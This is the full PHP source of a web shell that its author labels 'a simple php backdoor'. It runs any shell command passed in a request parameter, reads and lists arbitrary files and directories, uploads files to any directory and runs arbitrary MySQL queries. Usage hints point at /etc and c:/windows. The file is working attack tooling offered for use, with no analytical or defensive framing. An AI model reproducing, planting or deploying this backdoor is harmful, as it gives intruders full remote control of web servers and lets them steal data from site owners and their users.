// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\ob_implicit_flush();if(isset($_REQUEST['f'])){ $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); fpassthru($file); die;}if(isset($_REQUEST['d'])){ $d=$_REQUEST['d']; echo "<pre>"; if ($handle = opendir("$d")) { echo "

listing of $d

"; while ($dir = readdir($handle)){ if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>"; else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>"; echo "$dir\n"; echo "</font></a>"; } } else echo "opendir() failed"; closedir($handle); die ("<hr>"); }if(isset($_REQUEST['c'])){ echo "<pre>"; system($_REQUEST['c']); die;}if(isset($_REQUEST['upload'])){ if(!isset($_REQUEST['dir'])) die('hey,specify directory!'); else $dir=$_REQUEST['dir']; $fname=$HTTP_POST_FILES['file_name']['name']; if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname)) die('file uploading error.');}if(isset($_REQUEST['mquery'])){ $host=$_REQUEST['host']; $usr=$_REQUEST['usr']; $passwd=$_REQUEST['passwd']; $db=$_REQUEST['db']; $mquery=$_REQUEST['mquery']; mysql_connect("$host", "$usr", "$passwd") or die("Could not connect: " . mysql_error()); mysql_select_db("$db"); $result = mysql_query("$mquery"); if($result!=FALSE) echo "<pre>

query was executed correctly

\n"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); mysql_free_result($result); die;}<pre>
execute command: <hr>
upload file:&nbsp;&nbsp;
<hr>to browse go to http:// echo $SERVER_NAME.$REQUEST_URI; ?d=[directory here]
for example:http:// echo $SERVER_NAME.$REQUEST_URI; ?d=/etc on *nixor http:// echo $SERVER_NAME.$REQUEST_URI; ?d=c:/windows on win<hr>execute mysql query:
host: user: password: database: query:
<!-- http://michaeldaw.org 2006 -->